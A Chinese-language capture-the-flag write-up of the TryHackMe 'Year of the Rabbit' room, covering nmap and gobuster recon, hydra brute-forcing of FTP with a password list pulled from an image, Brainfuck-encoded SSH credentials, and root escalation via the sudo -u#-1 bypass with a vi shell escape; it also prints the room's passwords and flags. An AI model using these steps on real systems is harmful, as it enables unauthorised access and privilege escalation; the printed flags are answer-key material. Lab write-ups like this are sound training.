yeah of the rabbit
开启靶机,啥也不用说,nmap开扫
扫出21、22、80端口
用anonymous进ftp看看有没有东西
答案是没有甚至登不进去
打开burp进80的web页面看一手,顺便gobuster爆一下目录
进web页面 结果是:Apache2 Debian Default Page
gobuster啥也没爆出来
看一下源代码,有个/assets/style.css
点进去一眼就看到了 /sup3r_s3cr3t_fl4g.php
这个页面提示要关javascript ,那就进about:config给关了
重新加载页面,就一个视频,啥也没了,然后再看一下burp,看看每个请求的信息
我的burp安装了logger++,类似浏览器开发工具的network
/sup3r_s3cr3t_fl4g.php的之后一个请求是:
http://10.10.144.221//intermediary.php?hidden_directory=/WExYY2Cv-qU
看一眼这个参数的名称,进:
http://10.10.144.221/WExYY2Cv-qU
有一张图片,但是看这个图片竟是那个熟悉的女人,我相信学过misc或者图像处理的
应该对这个女人都不陌生,我估计图片里藏了东西
wget http://10.10.144.221/WExYY2Cv-qU/Hot_Babe.png
图片下载下来
strings ./Hot_Babe.png
果然有:
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
.....
.............
将一大串密码copy下来,用hydra爆破ftp
hydra -l ftpuser -P ./test1.txt 10.10.144.221 ftp
[21][ftp] host: 10.10.144.221 login: ftpuser password: 5iez1wGXKfPKQ
ftp> ls 229 Entering Extended Passive Mode (|||11713|). 150 Here comes the directory listing. -rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
有个文件下载下来,打开:
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
这一看长得跟jsfuck有得一拼
直接复制这段东西去百度,得知是brainfuck ,果然都带个fuck
解密:
User: eli
Password: DSpDiM1wAEwid
ssh登录进去之后一顿操作
ll
uname -a
id
sudo -l
sudo -V
env
ls -la /
cat /etc/passwd
find / -type f -u+s 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/mail/eli
....
把home都翻烂了,什么都没找到
最终回到env看PATH,把PATH每个目录挨个问候了一遍
PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
终于在/usr/games发现可疑文件夹,可疑到什么程度呢:明摆
li@year-of-the-rabbit:~$ ls -la /usr/games/s3cr3t/ total 12 drwxr-xr-x 2 root root 4096 Jan 23 2020 . drwxr-xr-x 3 root root 4096 Jan 23 2020 .. -rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
.
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
查看sudo -l
<pre>User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt</pre>
sudo -V
version 1.8.10p3
版本小于1.8.28,在thm的另一个sudo漏洞教学的room中,我学到了关于小于1.8.28版本的漏洞
尝试:
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
成功进入vi
:!/bin/bash
成功提权root
root@year-of-the-rabbit:/home/gwendoline# cat /root/root.txt THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}